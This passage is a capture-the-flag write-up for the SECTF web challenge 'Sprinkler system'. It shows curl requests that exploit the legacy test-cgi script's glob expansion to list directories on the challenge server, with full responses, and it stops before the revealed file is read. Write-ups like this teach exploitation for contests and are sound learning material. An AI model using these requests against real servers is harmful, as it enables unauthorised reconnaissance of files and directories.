[Web] SECTF - Sprinkler system



Sprinkler system - Web (100 + 0)

Damn new york… some chick tricked you into standing in the rain on the very first day… it’s payback time!

Solves: 238

Service: http://sprinklers.alieni.se/

Author: avlidienbrunn

Starting by looking into robots.txt

1
2
3
curl 'http://sprinklers.alieni.se/robots.txt'
User-agent: *
Disallow: /cgi-bin/test-cgi

We have a hidden directory /cgi-bin/test-cgi, my first instinct was to try shellshock but ofcourse it didn’t work so after a while searching in google I found this http://insecure.org/sploits/test-cgi.server_protocol.html.

To list the root directory we can do this:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
curl 'http://sprinklers.alieni.se/cgi-bin/test-cgi?/*'
CGI/1.0 test script report:

argc is 1. argv is /\*.

SERVER_SOFTWARE = Apache/2.4.18 (Ubuntu)
SERVER_NAME = sprinklers.alieni.se
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.1
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = */*
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = /app /bin /boot /dev /etc /git /home /lib /lib64 /media /mnt /opt /proc /root /run /sbin /srv /sys /tmp /usr /var
REMOTE_HOST =
REMOTE_ADDR = 172.68.102.79
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH =

Nothing special on the root directory lets try to list the current directory to instead of doing ?/ lets try ? at the end of the url:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
$ curl 'http://sprinklers.alieni.se/cgi-bin/test-cgi?*'
CGI/1.0 test script report:

argc is 1. argv is \*.

SERVER_SOFTWARE = Apache/2.4.18 (Ubuntu)
SERVER_NAME = sprinklers.alieni.se
GATEWAY_INTERFACE = CGI/1.1
SERVER_PROTOCOL = HTTP/1.1
SERVER_PORT = 80
REQUEST_METHOD = GET
HTTP_ACCEPT = */*
PATH_INFO =
PATH_TRANSLATED =
SCRIPT_NAME = /cgi-bin/test-cgi
QUERY_STRING = enable_sprinkler_system test-cgi
REMOTE_HOST =
REMOTE_ADDR = 172.68.102.79
REMOTE_USER =
AUTH_TYPE =
CONTENT_TYPE =
CONTENT_LENGTH

It works! there is a file named enable_sprinkler_system! lets see what is its content: